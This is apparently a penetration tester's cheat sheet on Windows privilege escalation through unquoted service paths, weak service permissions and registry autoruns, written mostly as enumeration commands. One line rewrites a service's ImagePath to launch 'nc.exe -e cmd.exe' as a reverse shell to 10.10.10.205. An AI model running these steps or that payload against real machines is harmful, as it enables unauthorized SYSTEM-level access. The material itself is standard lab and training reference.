unquoted-service-path

When a service is installed, the registry configuration specifies a path to the binary that should be executed on service start. If binary is not encapsulated within quotes, windows will attempt to locate the binary in different folders.

Searching for unquoted service paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""

								OR

wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

Tool

• Use PowerUp.ps1 to audit automatically

 Invoke-AllChecks

E.g., Path

C:\Program
C:\Program Files
C:\Program Files (x86)\System
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64

Know about the service starting time (to get to know about the service if it runs under system privileges)

sc qc <service Name>

			              OR

Get-Process -Name <name> | Select-Object -Property Name, StartInfo

Query service

sc qc SystemExplorerHelpService

Check folder permissions

icacls "<folder/file>"

			                      OR

.\accesschk /accepteula -uwdq "<path>"

Start service

stop-Process -Name "jusched" -Force

						OR

start-service -Name <srvname>

			            OR

net start <name>

						OR

sc stop SysaxScheduler

				         OR

sc start SysaxScheduler

Checking for weak service ACL in registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Changing Imagepath with powershell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Modifiable registry autorun binary (check start-up programs)

Lear more about this method

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl